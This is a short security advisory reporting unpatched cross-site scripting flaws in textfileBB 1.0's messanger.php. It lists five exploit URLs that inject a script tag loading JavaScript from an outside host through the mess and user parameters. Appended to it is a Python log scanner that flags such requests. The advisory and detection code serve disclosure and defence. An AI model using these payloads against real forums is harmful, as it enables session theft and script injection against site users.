textfileBB versions 1.0 and below suffer from multiple cross-site scripting flaws in the mess and user parameters of messanger.php.
5eb4e5cf22834d35068ecfd02e8d2c4ff8cab55454516658027b2915c06aa0f1
ORIGINAL: https://notlegal.ws/textfilebbmessanger.txt
software: textfileBB
vendor's website: https://tfbb.jcink.com/
versions: <= 1.0
class: remote
status: unpatched
exploit: available
solution: not available
discovered by: retard
risk level: medium
exploit(s):
https://example.com/messanger.php?mess=%3Cscript%20src=https://notlegal.ws/xss.js%3E%3C/script%3E
https://example.com/messanger.php?p=MSN&user=%3Cscript%20src=https://notlegal.ws/xss.js%3E%3C/script%3E
https://example.com/messanger.php?p=YIM&user=%3Cscript%20src=https://notlegal.ws/xss.js%3E%3C/script%3E
https://example.com/messanger.php?p=ICQ&user=%3Cscript%20src=https://notlegal.ws/xss.js%3E%3C/script%3E
https://example.com/messanger.php?p=AIM&user=%22%3E%3C/head%3E%3Cbody%3E%3Cscript%20src=https://notlegal.ws/xss.js%3E%3C/body%3E%3C/html%3E
credit:
author(s): retard
email: retard@30gigs.com
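
detection example (added here, not part of the original advisory and not textfileBB code): with no fix available, a Python check that scans web server access logs for requests to messanger.php whose mess or user value contains the characters the URLs above rely on. The log lines are constructed samples, and the combined access-log format is an assumption.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Parameters the advisory's URLs inject through.
REFLECTED_PARAMS = ("mess", "user")
# Characters the listed payloads rely on to open a tag or close an attribute.
MARKUP = re.compile(r'[<>"]')
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample entries; addresses come from documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /messanger.php?p=MSN&user=alice%40example.com HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:07 +0000] '
    '"GET /messanger.php?mess=%3Cscript%20src=https://placeholder.invalid/x.js'
    '%3E%3C/script%3E HTTP/1.1" 200 734',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /forum/messanger.php?p=AIM&user=%22%3E%3C/head%3E HTTP/1.1" 200 701',
    '192.0.2.44 - - [01/Jan/2024:10:01:30 +0000] '
    '"GET /index.php?mess=%3Cb%3E HTTP/1.1" 200 1290',
]


def suspicious_params(target):
    """Return the reflected parameters in a request target that carry markup."""
    parts = urlsplit(target)
    if "/messanger.php" not in parts.path.lower():
        return []
    # parse_qs percent-decodes values, so %3Cscript%3E is inspected as <script>.
    query = parse_qs(parts.query, keep_blank_values=True)
    return [name for name in REFLECTED_PARAMS
            if any(MARKUP.search(value) for value in query.get(name, []))]


def scan(log_lines):
    """Yield (line_number, parameter_names) for each request worth reviewing."""
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if match:
            hits = suspicious_params(match.group(1))
            if hits:
                yield number, hits


if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: markup in {', '.join(hits)}")
```

Only query-string values appear in access logs, so parameters sent in a POST body need the same check at the application or proxy layer.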